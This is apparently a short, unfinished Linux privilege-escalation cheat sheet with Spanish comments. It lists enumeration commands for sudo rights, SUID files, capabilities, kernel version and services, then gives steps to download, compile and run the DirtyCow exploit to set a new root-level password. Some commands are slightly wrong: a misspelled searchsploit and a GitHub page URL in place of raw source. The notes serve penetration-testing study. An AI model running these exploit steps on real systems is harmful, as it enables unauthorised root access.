Privilege escalation [in progress]
OS Info
lsb_release -a
getconf LONG_BIT # 32 or 64 bits linux
cat /etc/os-release
cat /etc/redhat-release # redhat dists
SUDO Perms && SUID Files && Capabilities
sudo -l # si aparece algo -> https://gtfobins.github.io/
find / \-perm -4000 2>/dev/null # Suid
getcap -r / 2>/dev/null # caps
find / \-user <user> 2>/dev/null # buscar archivos q pertezcan al user x
Kernel enumerate
cat /proc/version
uname -a
+------------+
searchexploit "Linux Kernel X.X"
Services Running
systemctl --type=service --state=running
systemd-cgtop
ps aux
ps -ef
top -n 1
service --status-all
DirtyCow (Linux Kernel <= 3.19.0-73.8)
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
wget https://github.com/FireFart/dirtycow/blob/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
./dirty <new-pass>
LinPeass
Last updated